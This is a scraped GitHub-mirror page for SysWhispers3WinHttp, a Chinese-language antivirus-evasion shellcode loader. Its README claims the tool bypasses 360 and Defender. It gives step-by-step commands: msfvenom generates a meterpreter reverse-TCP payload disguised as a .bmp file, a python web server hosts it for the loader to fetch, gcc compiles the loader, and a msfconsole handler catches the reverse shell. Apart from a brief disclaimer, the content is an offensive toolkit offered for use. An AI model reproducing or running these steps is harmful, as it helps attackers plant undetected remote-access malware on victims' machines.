Light

determinasc / syswhispers3winhttp Goto Github PK

View Code? Open in Web Editor NEW

28.0 1.0 2.0 26 KB

SysWhispers3WinHttp 基于SysWhispers3项目增添WinHttp分离加载功能并使用32位GCC进行编译，文件大小14KB，可免杀绕过360核晶防护与Defender

License: Apache License 2.0

C 100.00%

syswhispers3winhttp's Introduction

SysWhispers3WinHttp

SysWhispers3WinHttp 基于SysWhispers3项目增添WinHttp分离加载功能并使用32位GCC进行编译，文件大小14KB，可免杀绕过360核晶防护与Defender。

0x01 免责声明：

该项目仅供安全研究使用，禁止使用该项目进行违法操作，否则由使用者承担全部法律及连带责任。

0x02 使用：

// 1. 使用msfvenom生成shellcode（或使用CobaltStrike生成Stageless之shellcode）
msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.1.104 lport=4444 -f raw -o test.bmp

// 2. 使用python3开启Web服务（或使用CobaltStrike之Scripted Web Delivery功能）
python3 -m http.server

// 3. 修改SysWhispers3WinHttp.c 第40行IP地址并使用32位GCC进行编译
gcc .\syscalls.c .\SysWhispers3WinHttp.c -o .\SysWhispers3WinHttp.exe -masm=intel -fpermissive -w -s -lwinhttp

注：32位GCC下载地址为https://master.dl.sourceforge.net/project/mingw-w64/Toolchains%20targetting%20Win32/Personal%20Builds/mingw-builds/6.4.0/threads-win32/sjlj/i686-6.4.0-release-win32-sjlj-rt_v5-rev0.7z?viasf=1

0x03 演示：

msfconsole
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > run

360核晶截图

微步云沙箱截图

0x04 参考：

https://github.com/klezVirus/SysWhispers3

https://learn.microsoft.com/zh-cn/windows/win32/api/winhttp/nf-winhttp-winhttpconnect

syswhispers3winhttp's People

Contributors

Stargazers

Watchers

Forkers

svchost9913 1979843404

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.